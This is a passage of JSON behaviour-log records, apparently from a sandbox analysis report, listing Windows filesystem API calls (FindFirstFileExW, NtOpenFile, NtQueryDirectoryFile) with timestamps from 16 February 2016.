"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,878", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,888", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,928", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,008", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,018", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,048", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,058", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,088", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,098", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": 